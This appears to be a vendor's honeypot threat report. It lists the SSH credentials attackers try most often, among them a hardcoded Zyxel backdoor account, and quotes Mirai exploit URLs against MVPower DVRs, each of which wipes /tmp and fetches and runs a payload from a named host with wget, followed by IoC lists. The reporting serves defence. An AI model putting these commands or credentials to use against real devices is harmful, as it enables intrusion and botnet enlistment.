A good understanding of active threats is necessary to achieve a good security posture. The following report provides actual trends that emerge from the Internet Background Noise. The data are provided using two weeks of our Honeypots logs.
Top credentials tested by cyber threat actors on SSH protocol
In the chart below, you will find the most tested credentials on SSH protocol by cyber threat actors during the past couple of weeks. It is once again a great example of which login/password the threat actors are trying on every device connected to the Internet. First tip : make sure the devices that don’t need to be publicly connected to the Internet are not.
Furthermore, these credentials widely tested in the cyber space are useful intelligence for creating dictionaries of credentials. As an illustration, it will help your cyber security supervisor preventing the use of these basic credentials in the IT systems you are protecting.
| Login | Password |
| 3comcso | RIP000 |
| Admin | Password |
| ftpuser | 3245gs5662d34 |
| git | 3245gs5662d34 |
| oracle | 123456 |
| oracle | 3245gs5662d34 |
| oracle | oracle123 |
| pi | raspberry |
| postgres | 123456 |
| postgres | 3245gs5662d34 |
| PSEAdmin | $secure$ |
| support | 123456 |
| telnet | 123456 |
| ubnt | admin |
| ubuntu | 123456 |
| ubuntu | 3245gs5662d34 |
| ubuntu | 123456 |
| vadmin | 9vt@f3Vt |
| zyfwp | PrOw!aN_fXp |
The last credentials zyfwp/PrOw!aN_fXp refer to the CVE-2020-29583 (CVSSv3 : 9.8) on firmware version 4.60 of Zyxel USG devices and allow to use this account to login to the SSH server or web interface with admin privileges.
Our honeypots – unavoidable victims of Mirai botnet
Weeks after weeks, our honeypots get relentlessly hit by threat actors trying to enroll more and more devices into their Mirai botnet fleet. They target any device connected to the Internet to gather an army of botnet to be the most efficient for massive attacks such as DDoS.
The threat actor use the same User Agent : Hello, world.
In March, our worldwide honeypots were targeted with the following URLs :
/shell?cd+/tmp;rm+-rf+*;wget+94.158.247[.]123/jaws;sh+/tmp/jawsThe IP address 94.158.247[.]123 (hosted by AS 39798 MivoCloud SRL – US) included in the URL above is flagged as Mirai botnet for 2023 in VirusTotal. 55 IP addresses targeted our worldwide honeypots with this URL request.
/shell?cd+/tmp;rm+-rf+*;wget+128.199.134[.]42/jaws;sh+/tmp/jawsThe IP address 128.199.134[.]42 (hosted by AS AS 14061 DIGITALOCEAN-ASN – SG) included in the URL above is flagged as Mirai botnet in VirusTotal. 55 IP addresses targeted our worldwide honeypots with this URL request.
/shell?cd+/tmp;rm+-rf+*;wget+botbet.catbbos[.]fun/jaws;sh+/tmp/jawsThe domain botbet.catbbos[.]fun included in the URL above (created a month ago) is flagged as as Mirai botnet in VirusTotal. 52 IP addresses targerted our worldwide honeypots with this URL request.
/shell?cd+/tmp;rm+-rf+*;wget+45.77.243.49/jaws;sh+/tmp/jawsThe IP address 45.77.243.49 (hosted by AS 20473 AS-CHOOPA – SG) included in the URL above is flagged as malicious in VirusTotal. 45 IP addresses targeted our worldwide honeypots with this URL request.
The threat actors tried to exploit a Shell Command Execution vulnerability on MVPower digital video recorders which may allow remote attackers to execute commands on vulnerable systems. It is known as the CVE-2016-20016 (CVSSv3 : 9,8).
We found out that 75% IP addresses targeting our honeypots were from Vietnam, the rest being Chinese. 41% of the IP addresses are not known from public databases identifying malicious IP addresses.
Here is the repartition of the AS:
| AS | % |
| AS 140803 8, 195 Street, Thang Town, Hiep Hoa, Bac Giang, Viet Nam | 75% |
| AS 4134 Chinanet | 10% |
| AS 4837 CHINA UNICOM China169 Backbone | 2,5% |
| AS 56040 China Mobile communications corporation | 2,5% |
| AS 140903 CHINA TELECOM | 2,5% |
| AS 4837 CHINA UNICOM China169 Backbone | 2,5% |
| AS 4847 China Networks Inter-Exchange | 2,5% |
| AS 56040 China Mobile communications corporation | 2,5% |
IoCs :
- 1.119.168[.]202
- 120.237.206[.]76
- 27.129.128[.]239
- 60.223.233[.]250
- 183.237.207[.]140
- 218.23.126[.]101
- 218.4.170[.]126
- 220.180.37[.]203
- 60.161.138[.]28
- 60.221.224[.]111
- 103.178.229[.]142
- 103.162.28[.]193
- 103.162.29[.]181
- 103.162.29[.]185
- 103.167.196[.]147
- 103.178.229[.]37
- 103.167.196[.]181
- 103.173.157[.]235
- 103.178.229[.]11
- 103.178.229[.]131
- 103.162.28[.]117
- 103.162.28[.]195
- 103.162.29[.]52
- 103.173.157[.]193
- 103.178.229[.]148
- 103.161.177[.]39
- 103.167.196[.]133
- 103.167.197[.]108
- 103.173.156[.]252
- 103.178.228[.]111
- 103.167.197[.]64
- 103.173.157[.]229
- 103.178.228[.]218
- 103.167.196[.]170
- 103.167.197[.]116
- 103.173.157[.]212
- 103.173.157[.]220
- 103.173.157[.]234
- 103.173.157[.]250
Top ports/protocols targeted by threat actors
| Ports | Protocol |
| 445 | TCP |
| 22 | TCP |
| 23 | TCP |
| 80 | TCP |
| 6379 | TCP |
| 9100 & 9115 | TCP |
| 443 | TCP |
| 8088 | TCP |
| 5060 | UDP |
| 5555 | TCP |
It is good practice to block incoming traffic towards unused ports while open-to-traffic ports are safely monitored and protected.
DoS & DDoS Attempts monitored on our honeypots
CVE-2022-27255 exploit attempts monitored on our honeypots
Information remain TEHTRIS sole property and reproduction is forbidden
TEHTRIS is and remains sole property rights owner of the information provided herein. Any copy, modification, derivative work, associated document, as well as every intellectual property right, is and must remain TEHTRIS’ sole and exclusive property. TEHTRIS authorizes the user to access for read use only. Except as expressly provided above, nothing contained herein will be construed as conferring any license or right under any TEHTRIS’ copyright.
No warranty and liability
TEHTRIS will not be held liable for any use, improper or incorrect use of the information described and/or contained herein and assume no responsibility for anyone’s use of the information. Although every effort has been made to provide complete and accurate information, TEHTRIS makes no warranty, expressed or implied regarding accuracy, adequacy, completeness, legality, reliability, or usefulness of any information provided herein. This disclaimer applies to both isolated and aggregated uses of the information.
